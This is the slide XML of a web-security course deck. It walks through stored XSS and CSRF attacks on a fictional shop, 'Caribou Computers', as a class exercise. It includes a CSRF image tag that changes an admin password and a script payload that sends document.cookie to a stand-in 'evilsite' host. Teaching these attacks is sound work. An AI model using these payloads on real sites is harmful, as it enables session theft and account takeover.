              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We create a webpage, with a specially crafted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;IMG&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tag on it which points to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_admin.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> page.</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&lt;IMG </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</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caribou_admin.php?larry</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on,newpass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=sorry" /&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B52DE6FD-2549-65DD-15C1-EC94022814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2422493"/>
            <a:ext cx="4477570" cy="3131014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3044127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Evilsite.com (again!)</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69" cy="397661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If the administrator of Caribou Computers even just visits a page with this tag on it.  It will create an HTTP request on their behalf.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Which goes to the admin site along with this user's session cookie (remember we said that long lived cookies are bad?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The site simply processes the password change request!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go ahead and try it!</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407442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1" cy="3976612"/>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Welcome back to Caribou Computers!  You’re just in time to see our new website!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now instead of just shopping, our users can socialize!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is done through a comments section where users can talk about whatever they are interested in!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The comment system, for now is entirely anonymous!</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21083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1" cy="397661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So, Caribou Computers has given us a new challenge and of course, the first thing any good hacker does is reconnaissance! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Since the comment system allows us add content. Let’s see if we can put tags into the comment system!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try writing a comment with the &lt;b&gt; tag in it or something.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It works! Clearly, this site is just asking to be taken advantage of.</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99936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0" cy="397661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Of course, the next step is to try the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tag and the easy way to do that is by trying to insert an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>alert()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You might have to try this more than once to get it to work.  For example, you might need to use single or double quotes depending on how the enclosing HTML/JavaScript works.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once we have that working…What next?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96700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0" cy="397661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fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From here we want to get some data out of the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To keep things simple, we will again focus on exfiltrating the cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Of course, we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> just put another malicious link in the comment page and hope someone clicks it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But that might be noticed by the site administrators.  In our last hack the affiliate link only appeared when people clicked on our link.  The site administrators wouldn’t see it!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Not to mention there is something FAR more nefarious we can do.</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62584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0" cy="397661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fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember because of their lack of control over what can be posted in the comments section. We can make the browser of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>anyone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> who logs into this page run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> JavaScript we want.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We want to send data somewhere.  To another site. Do you remember a JavaScript function does this?  How about:</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fetch()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Believe it or not, we can embed just a little bit of JavaScript and send it to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Evilsite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> comments page.</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794186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0" cy="397661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fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is probably easier than you think it is! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In our last example we used fetch to demonstrate an AJAX application that communicated using the POST method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Here all we need to do is make a GET request.  We don’t need any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.then()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> clauses to handle the asynchronous nature of the request because we don’t care about whatever data our GET request returns with.  All we need is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;fetch("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite.php?comment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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)&lt;/script&gt;</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479745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0" cy="397661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marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once you create a post with that code in it.  It should appear as an “empty” comment on Caribou Computer’s page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you check the network tab in the browser developer tools though.  You will see that a GET request to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Evilsite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was fired off.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go back to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and you should see the session information in the comments page!</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395556332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1679</TotalTime>
  <Words>1555</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Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>1_RetrospectVTI</vt:lpstr>
      <vt:lpstr>Software Development &amp; Best Practices</vt:lpstr>
      <vt:lpstr>Getting started</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Is this still XSS?</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forging</vt:lpstr>
      <vt:lpstr>One more attack!</vt:lpstr>
      <vt:lpstr>Getting Started</vt:lpstr>
      <vt:lpstr>Caribou Computers (again!)</vt:lpstr>
      <vt:lpstr>Caribou Computers (again!)</vt:lpstr>
      <vt:lpstr>Caribou Computers (again!)</vt:lpstr>
      <vt:lpstr>Caribou Computers (again!)</vt:lpstr>
      <vt:lpstr>Caribou Computers (again!)</vt:lpstr>
      <vt:lpstr>Caribou Computers (again!)</vt:lpstr>
      <vt:lpstr>Caribou Computers (again!)</vt:lpstr>
      <vt:lpstr>Caribou Computers (again!)</vt:lpstr>
      <vt:lpstr>Evilsite.com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&amp; Best Practices</dc:title>
  <dc:creator>Graham, Jonathan</dc:creator>
  <cp:lastModifiedBy>Graham, Jonathan</cp:lastModifiedBy>
  <cp:revision>83</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-03T04:04:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-08T02:59:03Z</dcterms:modified>
</cp:coreProperties>
</file>